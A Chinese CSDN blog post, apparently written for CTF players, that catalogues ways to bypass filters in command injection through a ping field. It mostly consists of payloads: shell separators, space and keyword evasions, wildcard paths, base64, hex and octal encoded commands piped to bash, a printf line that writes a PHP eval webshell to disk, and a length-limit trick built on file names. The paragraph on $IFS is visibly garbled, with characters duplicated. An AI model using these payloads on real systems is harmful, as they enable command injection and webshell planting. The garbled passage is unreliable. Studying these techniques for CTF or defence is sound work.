ping命令执行及bypass

最新推荐文章于 2024-06-03 10:50:52 发布
最新推荐文章于 2024-06-03 10:50:52 发布
阅读量1k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45785288/article/details/110213257
版权

ping命令执行及bypass

管道符

windows 下

|直接执行后面的语句
||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
&前面和后面命令都要执行,无论前面真假
&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

Linux 下

;前面和后面命令都要执行,无论前面真假
|直接执行后面的语句
||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
&前面和后面命令都要执行,无论前面真假
&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

命令分割符被过滤

使用下面两个

%0a换行符,需要php环境
%0d回车符,需要php环境

空格绕过

常见的绕过符号有: $IFS 9 、 9 、 9{IFS} 、%09(php环境下)、 重定向符<>、>
I F S 在 l i n u x 下 表 示 分 隔 符 , 如 果 不 加 则 b a s h 会 将 I F S 解 释 为 一 个 变 量 名 , 加 一 个 就 固 定 了 变 量 名 , IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名, IFSlinuxbashIFSIFS 9 后 面 之 所 以 加 个 9后面之所以加个 9是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。
不仅 $9可以使用,我试了试其他的数字也都可以正确绕过。

过滤目录分隔符

目录分隔符/我们可以使用$HOME代替,HOME也是shell中的一个环境变量,表示当前用户的根目录,我们可以看看当前用户的HOME值是什么

image-20200731173205285

可以看到当前用户的根目录是/home/www-data,我们只需要/,所以我们可以用${HOME:0:1}来实现

关键词过滤

单引号绕过

w'h'o'am'i

双引号绕过

w"h"o"am"i

反斜线

c\at fl\ag

正则 (假设/bin/cat: test: 是一个目录)

/???/?[a][t] ?''?''?''?''`
`/???/?at ????`
`/???/?[a]''[t] ?''?''?''?''

使用 $@ 绕过

who$@ami

用通配符绕过

powershell C:\*\*2\n??e*d.*? # notepad

cat被过滤

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容

命令执行函数被过滤

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
反引号 同shell_exec()

利用编码绕过

#base64
echo Y2F0IC9mbGFn|base64 -d|bash ==>cat /flag
echo Y2F0IC9mbGFn|base64 -d|sh==>cat /flag
echo Y2F0IGZsYWcucGhw|base64 -d|bash==>cat flag.php
echo Y2F0IGZsYWcucGhw|base64 -d|sh==>cat flag.php
#hex
echo "0x636174202f666c6167" | xxd -r -p|bash ==>cat /flag
#oct/字节
$(printf "\154\163") ==>ls
$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag
{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag
#i也可以通过这种方式写马
内容为<?php @eval($_POST['c']);?>
${printf,"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"} >> 1.php

奇淫妓巧

内联执行执行

cat$IFS$9`ls`
cat$IFS$9$(ls)
这两个命令也意思就是执行当前目录下的所有文件

(内联,就是将``或$()内命令的输出作为输入执行)

利用ls -t和>以及换行符绕过长度限制执行命令(文件构造绕过)

root@kali:~/桌面# echo "flag{hahaha}" > flag.txt
root@kali:~/桌面# touch "ag"
root@kali:~/桌面# touch "fl\\"
root@kali:~/桌面# touch "t \\"
root@kali:~/桌面# touch "ca\\"
root@kali:~/桌面# ls -t
'ca\'  't \'  'fl\'   ag   flag
root@kali:~/桌面# ls -t >a     #将 ls -t 内容写入到a文件中
root@kali:~/桌面# sh a
a: 1: a: not found
flag{hahaha}
a: 6: flag.txt: not found

\ 是指换行
ls -t将文件按时间排序输出
sh命令可以从一个文件中读取命令来执行

参考博客 https://www.cnblogs.com/NPFS/p/13279815.html

​ https://www.cnblogs.com/micr067/p/12590152.html

​ https://blog.csdn.net/qq_45552960/article/details/104576189

​ https://blog.csdn.net/qq_42812036/article/details/104297163

​ https://www.freesion.com/article/9046720644/

林一不是01
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
命令执行 bypass
weixin_66977568的博客
09-25 299
命令执行 bypass
Ping命令
即将拥有鱼人线的金鱼的博客
12-31 1727
Ping命令 linux ping 命令解析 不管在windows平台,还是在linux平台,ping都是非常常用的网络命令ping命令通过ICMP(Internet控制消息协议)工作;ping可以用来测试本机与目标主机是否联通、联通速度如何、稳定性如何。 一 、ping 用法 ping命令运行在命令提示符终端,用法为:“ping 参数 目标主机”。其中参数为零到多个,目标主机可以是IP或者域名。 1 Usage:ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i int
用vc实现ping功能,检测是否在线
06-22
用vc实现ping功能
ctf-ping命令执行绕过
bamanju0574的博客
09-10 4929
题目连接:http://ctf.klmyssn.com/challenges#Ping 命令执行绕过,试了试过滤了一些:一些命令 但是反引号可以执行命令 通过拼接,可以拼接出来:ls 命令 127.0.0.1;`a="l";b="s";c=$a$b;$c` 可以发现 flag就是下面那一串flag_ 开头的字符串 在拼接命令来...
Windows命令执行bypass
神隐哥的博客
03-02 504
"whoami" ("whoami") who"a"mi who"a"^mi 双引号。括号。异或组合都可以正常执行命令 不能加两个。会被当成转义字符。成为一个 变量绕过 set a=1 echo a echo %a% set a=w set b=ahomi %a%%b% 利用环境变量绕过。 可通过set查看所有环境变量 echo net%programfiles:~10,1%user 取programfiles的环境变量中的第10位开始。取一位。为空格。然后就成了net user ..
CTF中的命令执行绕过方式
最新发布
2401_84466223的博客
06-03 936
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
看一眼就学会的命令执行绕过小妙招
真正的大师,永远都怀着一颗学徒的心。
12-30 3270
文章目录前言简单介绍下漏洞执行漏洞:一、命令执行的利用二、有趣的点来了原版:小妙招版 前言 简单介绍下漏洞执行漏洞: 命令执行(Command Execution)漏洞即我们可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等。 提示:以下是本篇文章正文内容,下面案例可供参考 一、命令执行的利用 在这.
关于命令执行Bypass的一些思路
hackzkaq的博客
08-24 1274
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-xiao_yi 一、常见命令执行的函数 system() system(string $command, int &$return_var = ?): string 执行系统命令,有回显 passthru() passthru(string $command, int &$return_var = ?): void 执行系统命令并且显示原始输出 shell_exec() shell_exec(string
bypass命令执行-简单梳理多种方式文件下载_命令执行
qq_36334672的博客
01-26 939
在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本,其位于C:\Windows\System32\Printing_Admin_Scripts\ en/zh-US,因为是vbs,可以直接调用。将生成的恶意dll文件放到修改成xwizards.dll,放到同目录下,这个有点类似于DLL劫持,1.txt为固定格式不用管他。可以将bitadmin里的签名删掉,可能有的杀软拦截的不是行为,而是恶意文件的特征。这里的不是我使用过的,根据看的网上文章进行了一个简单的收集和归纳。
命令执行bypss+无回显curl获取命令执行
qq_36334672的博客
01-26 1118
xp_dirtree ‘c:/’,1将c盘目录插入到tmp表里,这样就可以获取到C盘的文件,以此来探测路径。cat < a.txt : cat程序 显示 a.txt文件的内容 ,cat程序获取的不是文件名,而是a.txt的内容。基于windows的特性,双引号不会影响命令执行,而^会一定程度的影响命令执行,但是单独使用的时候也是正常的。cat a.txt : cat 程序读a.txt文件,并把它显示出来,cat获取到的是一个a.txt文件名。通过反引号,可以将一些无关的字符夹在在其中,造成混淆的作用。
FastJson远程命令执行漏洞学习笔记
ch98000的博客
09-04 457
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。
unctf记一次命令执行bypass
a3320315的博客
10-28 1193
0x01 贴代码 <?php highlight_file(__FILE__); $a = $_GET['a']; $b = $_GET['b']; // try bypass it if (preg_match("/\'|\"|,|;|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tai...
ping 命令详解 - DSCP
chenpuo的博客
08-15 2258
https://www.jianshu.com/p/0cb93b7b4f64 Linux命令参数详细解析-ping 概要 ping [-aAbBdDfhLnOqrRUvV] [-c count] [-F flowlabel] [-i interval] [-I inter‐ face] [-l preload] [-m mark] [-M pmtudisc_option] [-N nodeinfo_option] [-w deadline] [-W timeout] [-p patter...
ping功能你真的懂吗?
世界上最差的男孩子
01-18 5218
不要以为ping不通就是网不行,有时候是你ping的位置不对,有一些是指定源地址才能ping通的。 Windows自带的ping功能可以用来测试网络的连通性,但是你真的会用吗? 用法: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j ho...
WEB知识学习
qq_41672971的博客
10-11 344
123
CTFping命令绕过及符号用法
热门推荐
Hardworking666的博客
10-13 1万+
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
命令执行绕过 [GXYCTF2019]Ping Ping Ping1
m0_75178803的博客
10-10 857
在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值:本文目的在于结合 BU_绕过空格过滤。所以cat$IFS$1`ls`也相当于cat falg.php;`` 反引号 cat$IFS$1`ls`cat $a$b.php。通过变量赋值,再进行拼接,即可进行绕过。
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8761
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
php的正则绕过
Hammers_12的博客
09-07 1529
一、空格正则绕过: ${IFS} 但不能写作 $IFS $IFS$9 %09 <> < 二、 在PHP中,在正则绕过时可以利用\包裹住被过滤的函数,以此达到绕过的目的。例如: cat 进黑名单,用 c\a\t 绕过 空格进黑名单,用 ${IFS} 或者 %09 绕过 ✳ 和 flag 都被过滤,用和 ✳ 差不多的 ? 绕过,即 ???,获取四位的 flag ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值